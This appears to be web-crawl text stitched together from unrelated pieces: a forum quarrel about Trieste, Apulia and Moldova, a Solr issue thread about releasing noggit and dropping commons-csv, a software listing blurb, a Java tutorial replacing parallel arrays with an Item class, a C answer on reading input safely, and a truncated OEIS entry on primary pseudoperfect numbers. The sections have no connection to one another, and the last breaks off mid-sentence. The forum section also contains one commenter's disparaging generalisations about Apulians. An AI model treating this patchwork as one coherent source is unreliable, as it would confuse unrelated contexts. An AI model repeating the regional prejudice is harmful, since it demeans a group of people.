numbers and partially weighted graphs, Math. Comput., 69 (1999), 407-420. J. M. Grau, A. M. Oller-Marcen, and J. Sondow, On the congruence 1^m + 2^m + ... + m^m == n (mod m) with n|m, arXiv:1309.7941 [math.NT]. J. Sondow and K. MacMillan, Reducing the Erdos-Moser equation 1^n + 2^n + . . . + k^n = (k+1)^n modulo k and k^2, Integers 11 (2011), #A34. J. Sondow and E. Tsukerman, The p-adic order of power sums, the Erdos-Moser equation, and Bernoulli numbers, arXiv:1401.0322 [math.NT], 2014; see section 4. Eric Weisstein's World of Mathematics, Primary pseudoperfect number. 
Wikipedia, Primary pseudoperfect number. OEIS Wiki, Primary pseudoperfect numbers. A031971(a(n)) (mod a(n)) = A233045(n). - Jonathan Sondow, Dec 11 2013 A069359(a(n)) = a(n) - 1. - Jonathan Sondow, Apr 16 2014 From Daniel Forgues, May 24 2013: (Start) With a(1) = 2, we have 1/2 + 1/2 = (1 + 1)/2 = 1; with a(2) = 6 = 2 * 3, we have 1/2 + 1/3 + 1/6 = (3 + 2 + 1)/6 = (1*3 + 3)/(2*3) = (1 + 1)/2 = 1; with a(3) = 42 = 6 * 7, we have 1/2 + 1/3 + 1/7 + 1/42 = (21 + 14 + 6 + 1)/42 = (3*7 + 2*7 + 7)/(6*7) = (3 + 2 + 1)/6 = 1; with a(4) = 1806 = 42 * 43, we have 1/2 + 1/3 + 1/7 + 1/43 + 1/1806 = (903 + 602 + 258 + 42 + 1)/1806 = (21*43 + 14*43 + 6*43 + 43)/(42*43) = (21 + 14 + 6 + 1)/42 = 1; with a(5) = 47058 (not oblong number), we have 1/2 + 1/3 + 1/11 + 1/23 + 1/31 + 1/47058 = (23529 + 15686 + 4278 + 2046 + 1518 + 1)/47058 = 1. For n = 1 to 8, a(n) has n prime factors: a(1) = 2 a(2) = 2 * 3 a(3) = 2 * 3 * 7 a(4) = 2 * 3 * 7 * 43 a(5) = 2 * 3 * 11 * 23 * 31 a(6) = 2 * 3 * 11 * 23 * 31 * 47059 a(7) = 2 * 3 * 11 * 17 * 101 * 149 * 3109 a(8) = 2 * 3 * 11 * 23 * 31 * 47059 * 2217342227 * 1729101023519 If a(n)+1 is prime, then a(n)*[a(n)+1] is also primary pseudoperfect. We have the chains: a(1) -> a(2) -> a(3) -> a(4); a(5) -> a(6). (end) A primary pseudoperfect number (greater than 2) is oblong if and only if it is not the initial member of a chain. - Daniel Forgues, May 29 2013 If a(n)-1 is prime, then a(n)*(a(n)-1) is a Giuga number (A007850). This occurs for a(2), a(3), and a(5). See A235139 and the link "The p-adic order . . .", Theorem 8 and Example 1. - Jonathan Sondow, Jan 06 2014 (Python) from sympy import primefactors A054377 = [n for n in range(2, 10**5) if sum([n/p for p in primefactors(n)]) +1 == n] # Chai Wah Wu, Aug 20 2014 Cf. A005835, A007850, A069359, A168036, A190272, A191975, A203618, A216825, A216826, A230311, A235137, A235138, A235139, A236433. 
Sequence in context: A115961 A123137 A014117 * A230311 A007018 A100016 Adjacent sequences: A054374 A054375 A054376 * A054378 A054379 A054380 nonn,more,hard Eric W. Weisstein Title of Butske et al. corrected by Jonathan Sondow, Apr 11 2012 approved
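The defining property quoted above, that 1 plus the sum of n/p over the prime divisors p of n equals n, can be checked without sympy; here is a self-contained sketch using trial division:

```python
def prime_factors(n):
    """Distinct prime factors of n, by trial division."""
    factors, p = [], 2
    while p * p <= n:
        if n % p == 0:
            factors.append(p)
            while n % p == 0:
                n //= p
        p += 1
    if n > 1:
        factors.append(n)
    return factors

def is_primary_pseudoperfect(n):
    """True if n > 1 and 1 + sum(n/p over prime p dividing n) == n."""
    return n > 1 and 1 + sum(n // p for p in prime_factors(n)) == n
```

For example, is_primary_pseudoperfect(47058) reproduces the 1/2 + 1/3 + 1/11 + 1/23 + 1/31 + 1/47058 = 1 decomposition worked out above, after multiplying through by 47058.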
http://oeis.org/A054377
CC-MAIN-2015-06
refinedweb
805
79.7
For the discussion here, we define gateway metrics as metrics that are scoped to the gateway—that is, they measure something about the gateway. Since a gateway contains one or more volumes, a gateway-specific metric is representative of all volumes on the gateway. For example, the CloudBytesUploaded metric is the total number of bytes that the gateway sent to the cloud during the reporting period. This includes the activity of all the volumes on the gateway. When working with gateway metric data, you will specify the unique identification of the gateway that you are interested in viewing metrics for. To do this, you can either specify the GatewayId or the GatewayName. When you want to work with metrics for a gateway, you specify the gateway dimension in the metrics namespace, which distinguishes a gateway-specific metric from a volume-specific metric. For more information, see Using the Amazon CloudWatch Console. The following table describes the AWS Storage Gateway metrics that you can use to get information about your gateway. The entries in the table are grouped functionally by measure. In this section, we discuss the AWS Storage Gateway metrics that give you information about a storage volume of a gateway. Each volume of a gateway has a set of metrics associated with it. Note that some volume-specific metrics have the same name as a gateway-specific metric. These metrics represent the same kinds of measurements, but are scoped to the volume instead of the gateway. You must always specify whether you want to work with either a gateway or a storage volume metric before working with a metric. Specifically, when working with volume metrics, you must specify the VolumeId of the storage volume for which you are interested in viewing metrics. For more information, see Using the Amazon CloudWatch Console. The following table describes the AWS Storage Gateway metrics that you can use to get information about your storage volumes.
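To make the gateway-versus-volume distinction concrete, here is a sketch of how a CloudWatch metric query could be parameterized. The dimension names (GatewayId, GatewayName, VolumeId) come from the text; the helper function, the example gateway ID, and the "AWS/StorageGateway" namespace string are illustrative assumptions:

```python
def storage_gateway_metric_params(metric_name, dimension_name, dimension_value):
    """Build the scoping portion of a CloudWatch metric query.

    The same metric name (e.g. CloudBytesUploaded) can be scoped to a
    gateway (via GatewayId or GatewayName) or to a single volume (via
    VolumeId); the dimension is what distinguishes the two.
    """
    # Only the dimensions named in the documentation are accepted here.
    assert dimension_name in ("GatewayId", "GatewayName", "VolumeId")
    return {
        "Namespace": "AWS/StorageGateway",  # assumed standard namespace
        "MetricName": metric_name,
        "Dimensions": [{"Name": dimension_name, "Value": dimension_value}],
    }
```

Swapping the dimension from GatewayId to VolumeId turns the same query from a gateway-wide measurement into a per-volume one, which is exactly the choice the text says you must make before working with a metric.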
http://docs.aws.amazon.com/storagegateway/latest/userguide/AWSStorageGatewayMetricsList.html
CC-MAIN-2013-48
refinedweb
322
53.61
Since JDOM represents an API built on standard parsing packages, we can select the way we want the document to be loaded from a file. In order to load a JDOM document via SAX we have to use the SAXBuilder class. One of its constructors receives a boolean value, which allows us to define whether the document must be validated or not. The sample below shows how easy it is to load a JDOM document: import org.jdom.Document; import org.jdom.input.SAXBuilder; /** * This sample program shows how to load a JDOM document * using a SAX builder. */ public class Test { public static void main(String[] args) { try { // a builder takes a boolean value meaning validation mode: SAXBuilder builder = new SAXBuilder(false); // simply load the document: Document document = builder.build("sample.xml"); // .. do something ... } catch (Exception ex) { ex.printStackTrace(); } } }
http://www.java-tips.org/other-api-tips/jdom/reading-a-document-from-xml-file-with-sax-5.html
CC-MAIN-2013-48
refinedweb
155
66.64
CodePlex Project Hosting for Open Source Software Hi, I just tried to use the nuget package (nuget.org/packages/SharpKml) but it is very different from the released version here on codeplex. The nuget package only contains a Google.SharpKml namespace and the project link refers to a 404'ed page at cfreeze. Unfortunately I don't know anything about the NuGet package, sorry. I created SharpKml and host it here for anyone to use, but all I have is the Express version of Visual Studio, as it's just a hobby project, so I don't think I can maintain a NuGet project (I believe you need the professional edition?) You can either download the latest code from the source code section on CodePlex or try to get in touch with the author of the package to see if they will update it. Sorry I can't be of any more help. I don't think you need VS Pro to maintain a NuGet package. Download the command line version and use that to make the package and publish it. Here is some documentation on it.
http://sharpkml.codeplex.com/discussions/355816
CC-MAIN-2017-30
refinedweb
220
82.65
For an n by n real matrix A, Hadamard's upper bound on the determinant is

\det(A)^2 \le \prod_{i=1}^{n} \sum_{j=1}^{n} a_{ij}^2

where aij is the element in row i and column j. See, for example, [1]. How tight is this upper bound? To find out, let's write a little Python code to generate random matrices and compare their determinants to Hadamard's bounds. We'll take the square root of both sides of Hadamard's inequality to get an upper bound on the absolute value of the determinant. Hadamard's inequality is homogeneous: multiplying the matrix A by λ multiplies both sides by λ^n. We'll look at the ratio of Hadamard's bound to the exact determinant. This has the same effect as generating matrices to have a fixed determinant value, such as 1.

from scipy.stats import norm
from scipy.linalg import det
import matplotlib.pyplot as plt
import numpy as np

# Hadamard's upper bound on determinant squared
def hadamard(A):
    return np.prod(np.sum(A**2, axis=1))

N = 1000
ratios = np.empty(N)
dim = 3

for i in range(N):
    A = norm.rvs(size=(dim, dim))
    ratios[i] = hadamard(A)**0.5/abs(det(A))

plt.hist(ratios, bins=int(N**0.5))
plt.show()

In this simulation the ratio is very often around 25 or less, but occasionally much larger, 730 in this example. It makes sense that the ratio could be large; in theory the ratio could be infinite because the determinant could be zero. The error is frequently much smaller than the histogram might imply since a lot of small values are binned together. I modified the code above to print quantiles and ran it again.

print(min(ratios), max(ratios))
qs = [0.05, 0.25, 0.5, 0.75, 0.95]
print( [np.quantile(ratios, q) for q in qs] )

This printed

1.0022 1624.9836
[1.1558, 1.6450, 2.6048, 5.7189, 32.49279]

So while the maximum ratio was 1624, the ratio was less than 2.6048 half the time, and less than 5.7189 three quarters of the time. Hadamard's upper bound can be very inaccurate; there's no limit on the relative error, though you could bound the absolute error in terms of the norm of the matrix.
However, very often the relative error is moderately small. More posts on determinants [1] Courant and Hilbert, Methods of Mathematical Physics, Volume 1. One thought on “Hadamard’s upper bound on determinant” Random Comments: Since the determinant is just the (signed) volume of a box spanned by (say) the row space, just by treating the rows as being orthogonal (even if they aren’t) gives that bound. Since the Hadamard bound is asymmetric between rows and columns, you could get a slightly tighter bound by considering the minimum of the Hadamard bounds of A and transpose(A). I suspect it doesn’t help much.
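Two claims in the post and the comment above are easy to verify numerically: Hadamard's bound is attained when the rows are orthogonal, and taking the minimum of the bounds for A and transpose(A), as the commenter suggests, can only tighten it. A short sketch:

```python
import numpy as np

def hadamard_bound(A):
    """Hadamard's upper bound on |det(A)|: the product of the row norms."""
    return np.prod(np.sum(A**2, axis=1)) ** 0.5

def hadamard_bound2(A):
    """The commenter's variant: minimum of the row-based and column-based bounds."""
    return min(hadamard_bound(A), hadamard_bound(A.T))

# Equality case: orthogonal rows (the identity is the simplest example).
assert abs(hadamard_bound(np.eye(3)) - abs(np.linalg.det(np.eye(3)))) < 1e-12
```

By construction hadamard_bound2(A) is never larger than hadamard_bound(A); whether it helps much on random matrices is, as the commenter suspects, another question.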
https://www.johndcook.com/blog/2020/07/22/hadamard-inequality/
CC-MAIN-2022-40
refinedweb
483
65.73
An Ionic page with a back or a menu button and my Swiss recipe to cook Rösti May 11, 2019 Imagine Switzerland, stunning mountains, green grass everywhere, sun is shining, you’ve got a view on the Matterhorn, some cows are sitting peacefully next door doing nothing and you are eating some Rösti with your friends. Have you pictured this lovely time and view in your mind? Sure? Good because that isn’t at all today’s case 😂 I’m in Zürich, it’s super grey outside, it’s rainy, freaking cold and windy but the good point is, it gives me time to write a new blog post 😉 Earlier this week I published a trick I use often about “How to close Ionic modals using the hardware back button” and I thought that I would then share another quick one regarding how to display conditionally a back or menu button in a page of an application developed with Ionic. UX You might ask yourself “why such a UX”? Well, you might want to list a page in your menu (navigation “root”) but at the same time, you might want to implement a direct link from another page to that particular page without letting your users become confused about how to come back to the caller page (navigation “forward”). I guess you might be confused about my explanation 🤔 Therefore here’s what would happen if we would implement nothing particular. In both cases, navigation “root” or “forward”, the icon and its action would remain linked with the menu. And here’s what we are going to achieve: Implementation Our goal is to render an ion-menu-button or an ion-back-button according to the navigation, as Ionic components are just going to take care of the rest.
Therefore, the first thing we have to do is to declare a boolean variable in our page/component to reflect these two states, for example a public boolean variable called canGoBack : canGoBack: boolean = false; Note: in this blog post I display an Angular implementation. Once added, we could modify the ion-header of our page and add the two conditional buttons: <ion-header> <ion-toolbar> <ion-buttons slot="start"> <ion-back-button *ngIf="canGoBack"></ion-back-button> <ion-menu-button *ngIf="!canGoBack"></ion-menu-button> </ion-buttons> <ion-title> Nothing </ion-title> </ion-toolbar> </ion-header> Finally (didn’t I tell you, it’s a super quick solution), we just have to implement the code to set the correct state on our variable when our page/component is loading. For that purpose, Ionic provides a handy IonRouterOutlet which lets us know if there is a page in the stack to go back to or none. import {Component, OnInit} from '@angular/core'; import {IonRouterOutlet} from '@ionic/angular'; @Component({ selector: 'app-nothing', templateUrl: 'nothing.page.html', styleUrls: ['nothing.page.scss'] }) export class NothingPage implements OnInit { canGoBack: boolean = false; constructor(private routerOutlet: IonRouterOutlet) { } ngOnInit() { this.canGoBack = this.routerOutlet && this.routerOutlet.canGoBack(); } } That’s it, we have implemented a conditional back or menu button and action 🎉 Cherry on the cake 🍒🎂 I like to always end my articles with a last paragraph “Cherry on the cake” where I give another hint or trick related to the content I displayed, but in this particular article I don’t have a specific one in mind. Therefore, instead of something related to the above solution, here’s my dead simple recipe to cook your own Rösti: These kind of Rösti but with, optionally, smaller pieces of bacon - Boil 500 grams to 1 kilo of potatoes (for two) and once ready, let them cool down. Note: that step is optional, if you don’t have time you could cook the meal with raw potatoes but it’s more yummy with boiled ones. - Chop an onion.
- In a stove, warm up some oil and briefly cook the onion. - If you are in a hungry mood and not vegetarian, you could now add some small pieces or cubes of bacon in your stove and cook them too. Not necessary, it adds a bit of fat to the recipe but it also adds some taste, it’s up to you 😉 - Peel the potatoes. In English I think you would use a tool called a “vegetable peeler” for that purpose, in French the tool is called an “économe”. - Chop the potatoes. For that step you will use a grater or shredder, in French I call this tool “une râpe”. - Tips and tricks: once peeled, if you wait too long before cooking, your potatoes might turn “brownish-weird-grey-color” while cooking. To preserve them, instead of just sparing them on the side, if you are a bit slow like me, you could spare them in a bowl of (cold) water which will preserve their “integrity”. - Add the chopped potatoes to your stove and gild them for 5 minutes. - Now, bring the heat of the stove down (“medium power”) and shape the potatoes like a cake (“a circle of 20–30 cm diameter and 5 cm height”) with a spatula centered in your stove and DON’T TOUCH THEM for the next 15 minutes, let them cook like this. - After that time, gonna be a bit tricky, put a flat dinner plate on the top of your potatoes and get them out of the fire REVERSED on your plate. - If you feel that your stove is now not oily enough, add a bit of oil in it. - Once done, add back the potatoes we reserved on the plate back on the side which is not yet cooked (get it, that’s why we reversed them) and cook them for another 15 minutes. IMPORTANT: don’t break the cake, the potatoes should remain together, so be gentle in your moves. - 5 minutes before the end of the cooking, if you wish, you could cook one or two fried eggs in another stove which you could later add on the top of the Rösti.
I sometimes do that extra step because the yellow part of the egg will work as a nice “binder” to make things a bit less dry and gives a bit of extra calories and fat, in case that would not be enough yet 🤣 That’s it, once the cooking is over, your Rösti are ready to be eaten 🤗 To infinity and beyond 🚀 David
https://daviddalbusco.com/blog/an-ionic-page-with-a-back-or-a-menu-button-and-my-swiss-recipe-to-cook-rosti/
Implement Email in Open Event Server

In FOSSASIA's Open Event Server project, we send out emails when various actions are performed using the API. For example, when a new user is created, he/she receives an email welcoming him to the server, as well as an email-verification email. Users get role invites from event organisers in the form of emails, and when someone buys a ticket he/she gets a PDF link to the ticket as an email. So, as you can understand, all the important information that the user needs to be notified about is sent as an email to the user, and sometimes to the organizer as well. In FOSSASIA, we use sendgrid's API or an SMTP server, depending on the admin settings, for sending emails. You can read more about how we use sendgrid's API to send emails in FOSSASIA here. Now let's dive into the modules that we have for sending the emails. The three main parts in the entire email sending are:

- Model – Storing the Various Actions
- Templates – Storing the HTML templates for the emails
- Helpers – Implementing the actual email sending functions

Let's go through each of these modules one by one.

Model

USER_REGISTER = 'User Registration'
USER_CONFIRM = 'User Confirmation'
USER_CHANGE_EMAIL = "User email"
INVITE_PAPERS = 'Invitation For Papers'
NEXT_EVENT = 'Next Event'
NEW_SESSION = 'New Session Proposal'
PASSWORD_RESET = 'Reset Password'
PASSWORD_CHANGE = 'Change Password'
EVENT_ROLE = 'Event Role Invitation'
SESSION_ACCEPT_REJECT = 'Session Accept or Reject'
SESSION_SCHEDULE = 'Session Schedule Change'
EVENT_PUBLISH = 'Event Published'
AFTER_EVENT = 'After Event'
USER_REGISTER_WITH_PASSWORD = 'User Registration during Payment'
TICKET_PURCHASED = 'Ticket(s) Purchased'

In the Model file, named mail.py, we first declare the various actions for which we send the emails out. These actions are globally used as the keys in the other modules of the email sending service. Here, we define global variables with the name of the action as strings in them.
These are all constants, which means that their values remain the same throughout and never change. For example, USER_REGISTER has the value 'User Registration', which essentially means that anything related to the USER_REGISTER key is executed when the User Registration action occurs. Or, in other words, whenever a user registers into the system by signing up or creating a new user through the API, he/she receives the corresponding emails.

Apart from this, we have the model class which defines a table in the database. We use this model class to store the actions performed while sending emails in the database. So we store the action, the time at which the email was sent, the recipient and the sender. That way we have a record of all the emails that were sent out via our server.

class Mail(db.Model):
    __tablename__ = 'mails'
    id = db.Column(db.Integer, primary_key=True)
    recipient = db.Column(db.String)
    time = db.Column(db.DateTime(timezone=True))
    action = db.Column(db.String)
    subject = db.Column(db.String)
    message = db.Column(db.String)

    def __init__(self, recipient=None, time=None, action=None, subject=None, message=None):
        self.recipient = recipient
        self.time = time
        if self.time is None:
            self.time = datetime.now(pytz.utc)
        self.action = action
        self.subject = subject
        self.message = message

    def __repr__(self):
        return '<Mail %r to %r>' % (self.id, self.recipient)

    def __str__(self):
        return unicode(self).encode('utf-8')

    def __unicode__(self):
        return 'Mail %r by %r' % (self.id, self.recipient,)

The table in which all the information is stored is named mails. It stores the recipient, the time at which the email is sent (timezone aware), the action which initiated the email sending, the subject of the email and the entire HTML body of the email. In case a datetime value is passed in, we use that, else we use the current time in the time field.
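To illustrate the constructor's timestamp logic in isolation, here is a minimal plain-Python sketch of the model (no SQLAlchemy involved, the class name MailRecord is made up, and it uses the standard library's timezone.utc where the project uses pytz):

```python
from datetime import datetime, timezone

class MailRecord(object):
    # Sketch of the Mail model's __init__: if no timestamp is given,
    # default to the current timezone-aware UTC time.
    def __init__(self, recipient=None, time=None, action=None,
                 subject=None, message=None):
        self.recipient = recipient
        self.time = time if time is not None else datetime.now(timezone.utc)
        self.action = action
        self.subject = subject
        self.message = message
```

Storing a timezone-aware datetime avoids ambiguity when the server and the database run in different timezones.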
HTML Templates

We store the HTML templates in the form of key-value pairs in a file called system_mails.py inside the helpers module of the API. Inside system_mails, we have a global dict variable named MAILS, as shown below.

MAILS = {
    EVENT_PUBLISH: {
        'recipient': 'Organizer, Speaker',
        'subject': u'{event_name} is Live',
        'message': (
            u"Hi {email}<br/>" +
            u"Event, {event_name}, is up and running and ready for action. Go ahead and check it out." +
            u"<br/> Visit this link to view it: {link}"
        )
    },
    INVITE_PAPERS: {
        'recipient': 'Speaker',
        'subject': u'Invitation to Submit Papers for {event_name}',
        'message': (
            u"Hi {email}<br/>" +
            u"You are invited to submit papers for event: {event_name}" +
            u"<br/> Visit this link to fill up details: {link}"
        )
    },
    SESSION_ACCEPT_REJECT: {
        'recipient': 'Speaker',
        'subject': u'Session {session_name} has been {acceptance}',
        'message': (
            u"Hi {email},<br/>" +
            u"The session <strong>{session_name}</strong> has been <strong>{acceptance}</strong> by the organizer. " +
            u"<br/> Visit this link to view the session: {link}"
        )
    },
    SESSION_SCHEDULE: {
        'recipient': 'Organizer, Speaker',
        'subject': u'Schedule for Session {session_name} has been changed',
        'message': (
            u"Hi {email},<br/>" +
            u"The schedule for session <strong>{session_name}</strong> has been changed. " +
            u"<br/> Visit this link to view the session: {link}"
        )
    },

Inside the MAILS dict, we have key-value pairs, where for the keys we use the global variables from the Model to define the action related to the email template. In the value, we again have 3 different key-value pairs – recipient, subject and message. The recipient defines the group who should receive this email, the subject goes into the subject part of the email, while message forms the body of the email. For subject and message we use unicode strings with named placeholders that are used later for formatting using python's .format() function.
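As a small, self-contained sketch of how those named placeholders get filled in (the MAILS entry here is made up to keep the example short, and the render helper is hypothetical, not part of the project's API):

```python
# A made-up template table in the same shape as system_mails.py
NEW_SESSION = 'New Session Proposal'
MAILS = {
    NEW_SESSION: {
        'recipient': 'Organizer',
        'subject': u'New session proposal for {event_name}',
        'message': u'Hi {email}<br/>A new session was proposed for {event_name}.',
    },
}

def render(action, **params):
    # Look the template up by its action key and fill the
    # named placeholders with str.format()
    entry = MAILS[action]
    return entry['subject'].format(**params), entry['message'].format(**params)

subject, body = render(NEW_SESSION, event_name='FOSSASIA', email='user@example.com')
```

Note that str.format() silently ignores extra keyword arguments, which is convenient here: the subject only uses {event_name} even though {email} is also passed.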
Helpers

This is the most important part of the entire email sending system, since this is the place where the email sending functionality is implemented using the above two modules. We have all these functions inside a single file, namely mail.py, inside the helpers module of the API. Firstly, we import two things in this file: the global dict variable MAILS defined in the template file above, and the various global action variables defined in the model. There is one main function, used by every other individual function for sending the emails, defined as send_email(to, action, subject, html). This function takes as parameters the email address to which the email is to be sent, the subject string and the HTML body string, along with the action to store in the database.

Firstly we ensure that the email address of the recipient is present and isn't an empty string. After we have ensured this, we retrieve the email service as set in the admin settings. It can either be "smtp" or "sendgrid". The email address of the sender is formatted differently depending on the email service we are using. While sendgrid uses just the email, say for example "[email protected]", smtp uses a slightly different format, like this: Medozonuo Suohu<[email protected]>. So we set that as well, in the email_from variable.
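The sender formatting described above can be sketched as a small helper (the function name format_sender is made up for illustration; the real code just sets the email_from variable inline):

```python
def format_sender(email_service, name, email):
    # smtp expects a display name, e.g. "Medozonuo Suohu<medo@example.com>",
    # while sendgrid takes the bare address (per the admin-settings logic above)
    if email_service == 'smtp':
        return '{}<{}>'.format(name, email)
    return email
```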
def send_email(to, action, subject, html):
    """
    Sends email and records it in DB
    """
    payload = {
        'to': to,
        'from': email_from,
        'subject': subject,
        'html': html,
    }
    if not current_app.config['TESTING']:
        if email_service == 'smtp':
            smtp_encryption = get_settings()['smtp_encryption']
            if smtp_encryption == 'tls':
                smtp_encryption = 'required'
            elif smtp_encryption == 'ssl':
                smtp_encryption = 'ssl'
            elif smtp_encryption == 'tls_optional':
                smtp_encryption = 'optional'
            else:
                smtp_encryption = 'none'
            config = {
                'host': get_settings()['smtp_host'],
                'username': get_settings()['smtp_username'],
                'password': get_settings()['smtp_password'],
                'encryption': smtp_encryption,
                'port': get_settings()['smtp_port'],
            }
            from tasks import send_mail_via_smtp_task
            send_mail_via_smtp_task.delay(config, payload)

After this we create the payload, containing the email address of the recipient, the email address of the sender, the subject of the email and the HTML body of the email. For unit testing, and any other testing, we avoid email sending since that is really not required in the flow. So we check that the current app is not configured to run in a testing environment. After that, we have two different implementations depending on the email service used.

SMTP

There are three kinds of possible encryptions that can be used with an smtp server – tls, ssl and optional. We determine this based on the admin settings again. Also from the admin settings we collect the host, username, password and port for the smtp server. After this we start a celery task for sending the email. Since sending email to a number of clients can be time consuming, we do it using the celery queueing service, without disturbing the main workflow of the entire system.

@celery.task(name='send.email.post.smtp')
def send_mail_via_smtp_task(config, payload):
    # ... Mailer and Message setup from `config` and `payload` ...
    message.rich = payload['html']
    mailer.send(message)
    mailer.stop()

Inside the celery task, we use the Mailer and Message classes from the Marrow module of Python.
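The encryption mapping above can also be written as a single dict lookup. This is just an equivalent sketch (the helper name is made up, the project keeps the if/elif chain inline):

```python
def normalize_smtp_encryption(value):
    # admin setting -> encryption mode expected by the mailer;
    # anything unrecognized falls back to 'none'
    return {'tls': 'required', 'ssl': 'ssl', 'tls_optional': 'optional'}.get(value, 'none')
```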
We configure the Mailer according to the various settings received from the admin and then use the payload to send the email.

Sendgrid

For sending email using the sendgrid API, we need to set the Bearer key which is used for authenticating with the email service. This key is also defined in the admin settings. After we have set the Bearer key as the authorization header, we again initiate the celery task corresponding to the sendgrid email sending service.

@celery.task(name='send.email.post')
def send_email_task(payload, headers):
    requests.post(
        "",
        data=payload,
        headers=headers
    )

To send the email, all we need to do is make a POST request to the API endpoint "" with the headers, which contain the Bearer key, and the data, which contains the payload with all the information related to the recipient, sender, subject of the email and the body of the email.

Apart from these, this module implements all the individual functions that are called based on the various actions that occur. For example, let's look into the email sending function for the case when a new session is created.

def send_email_new_session(email, event_name, link):
    """email for new session"""
    send_email(
        to=email,
        action=NEW_SESSION,
        subject=MAILS[NEW_SESSION]['subject'].format(
            event_name=event_name
        ),
        html=MAILS[NEW_SESSION]['message'].format(
            email=email,
            event_name=event_name,
            link=link
        )
    )

This function is called inside the Sessions API, for every speaker of the session as well as for every organizer of the event to which the session is submitted. Inside this function, we use send_email(). But first we need to create the subject and the message body of the email using the templates, replacing the placeholders with actual values using python formatting. MAILS[NEW_SESSION]['subject'] returns a unicode string: u'New session proposal for {event_name}'. So what we do is use the .format() function to replace {event_name} with the actual event_name received as a parameter.
So it is equivalent to doing something like:

u'New session proposal for {event_name}'.format(event_name='FOSSASIA')

which gives us a resulting string of the form:

u'New session proposal for FOSSASIA'

Similarly, we create the HTML message body using the templates and the parameters received. After this is done, we make a function call to send_email(), which then sends the final email.

References:
- Read about how to send emails using the Sendgrid API
- Read more about various Python string formatting
- Read more about Marrow Mailer
https://blog.fossasia.org/tag/celery/
Apologies if there is a really simple answer to this. After two days of searching I haven't found it. I am scraping a table from a website and building a list of strings by looping. My code works great until there is a comma in one of the values. This is how I'm building the list (looping structure omitted, clearly):

record = (name, availability, upc, price)
productList.append(",".join(item or "" for item in record))

[u'Product One, In Stock, 999999999999, $99.99', u'Product Two, In Stock, ....]

import unicodecsv as csv
...
f = open('data.csv', 'wb')
w = csv.writer(f, delimiter=",")
w.writerow([x.split(',') for x in productList])
f.close()

Stop manually adding and removing commas yourself. That's why the csv/unicodecsv modules exist: do it by hand and you'll get stuff like quoting wrong. When building your rows, make them plain sequences (lists or tuples) of the fields, not the whole row as a single string:

productList.append([item or "" for item in record])
# If the `or ""` is only there to handle Nones, the module already handles this, so you can simplify:
productList.append(record)

When writing the rows, they're already in the correct form, so no splitting is needed:

with open('data.csv', 'wb') as f:
    w = csv.writer(f, delimiter=",")
    w.writerows(productList)
    # the writerows call is just a faster way to do:
    # for row in productList: w.writerow(row)
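To see why letting the writer handle the commas works, here is a small standalone sketch (using the standard-library csv module and made-up product data, written to an in-memory buffer instead of a file):

```python
import csv
import io

rows = [
    [u'Product One, Deluxe', u'In Stock', u'999999999999', u'$99.99'],
    [u'Product Two', u'In Stock', u'888888888888', u'$9.99'],
]

buf = io.StringIO()
w = csv.writer(buf)
w.writerows(rows)

# The field containing a comma is quoted automatically,
# so it survives a round-trip through a csv reader intact.
parsed = list(csv.reader(io.StringIO(buf.getvalue())))
```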
https://codedump.io/share/ckIdb7Xz9P8t/1/write-a-list-of-strings-in-a-list-that-may-or-may-not-contain-commas-to-a-csv-in-python
In w§gtr I have found myself facing a piece of code which, for the life of me, I just could not understand a few things in! Seeing as this is the closest board relating to the subject, I shall post my question here. The code I speak of is:

class String
  # The parts of my daughter's organ instructor's name.
  @@syllables = [
    { 'Paij' => 'Personal', 'Gonk' => 'Business', 'Blon' => 'Slave',
      'Stro' => 'Master', 'Wert' => 'Father', 'Onnn' => 'Mother' },
    { 'ree' => 'AM', 'plo' => 'PM' }
  ]

  # A method to determine what a certain name of his means.
  def name_significance
    parts = self.split('-')
    syllables = @@syllables.dup
    signif = parts.collect do |p|
      syllables.shift[p]
    end
    signif.join(' ')
  end
end

Now, what I could not understand is: Why is @@syllables divided into two hashes? Why is it an array in the first place? And secondly, "syllables.shift[p]". Playing around, I gathered that the .shift[p] method returns the result of hash[p] and extracts the pair from the hash. Yet I was told that the [p] part isn't an argument! So I can't seem to fully understand this code… It doesn't seem to work when I join the two hashes into one, and, again, I can't understand why. It is probably just a little thing I'm missing, or some such. If anyone could be of assistance, I will be very grateful.

Yours,
-Gill
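One way to see what is going on is to transcribe the same logic into another language. Here is a Python sketch of it: shift (pop(0) in Python) removes and returns the first hash from the array, and [p] is then an ordinary hash lookup on that returned hash, not an argument to shift. The array holds two hashes because the first name part is looked up in the first table and the second part in the second table, which is also why merging them into one hash breaks the code: the positional pairing of "which table goes with which syllable" is lost.

```python
# The two tables: first-syllable meanings, then second-syllable meanings.
syllables = [
    {'Paij': 'Personal', 'Gonk': 'Business', 'Blon': 'Slave',
     'Stro': 'Master', 'Wert': 'Father', 'Onnn': 'Mother'},
    {'ree': 'AM', 'plo': 'PM'},
]

def name_significance(name):
    parts = name.split('-')
    tables = list(syllables)      # like @@syllables.dup: copy so we can consume it
    meanings = []
    for p in parts:
        table = tables.pop(0)     # like syllables.shift: take the NEXT table
        meanings.append(table[p]) # then [p] is a plain hash/dict lookup on it
    return ' '.join(meanings)
```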
https://www.ruby-forum.com/t/newbie-question-problem-understanding-w-p-gtr/153383
On Bifunctor IO and Java's Checked Exceptions

The Bifunctor IO data type is a hot topic in the Scala community. In this article however I'm expressing my dislike for it, because it shares the same problems as Java's Checked Exceptions.

What is IO? #

Normally the IO data type is expressed as:

sealed trait IO[+A] { ??? }

What this means is that IO is like a thunk, like a function with zero parameters, that upon execution will finally produce an A value, if successful. The type also signals possible side effects that might happen upon execution, but since it behaves like a function (that hasn't been executed yet), when you are given an IO value you can consider it as being pure (and the function producing it has referential transparency). This means that IO can be used to describe pure computations. Modern IO implementations for the JVM are also capable of describing asynchronous processes, therefore you can also think of IO as being:

opaque type IO[+A] = () => Future[A]

If we had opaque types this would work well ;-)

Available implementations are:

- cats.effect.IO
- monix.eval.Task
- scalaz.concurrent.Task (in the 7.2.x and 7.3.x series)

Some cool presentations on this subject:

- The Making of an IO (ScalaIO FR, 2017)
- What Referential Transparency can do for you (ScalaIO FR, 2017)
- Monix Task: Lazy, Async and Awesome (flatMap(Oslo), 2016)

IO[+A] implements MonadError[IO, Throwable]. And if we're talking of Cats-Effect or Monix, it also implements Sync, among others. This means that IO[+A] can terminate with an error, it can terminate in a Throwable, actually reflecting the capabilities of the Java runtime. This means that this code is legit:

import cats.effect.IO
import scala.util.Random

def genRandomPosInt(max: Int): IO[Int] =
  IO(Math.floorMod(Random.nextInt(), max))

The astute reader might notice that this isn't a total function, as it could throw an ArithmeticException. An easy mistake to make.

What's the Bifunctor IO?
# I'm going to call this data type BIO, to differentiate it from the IO above:

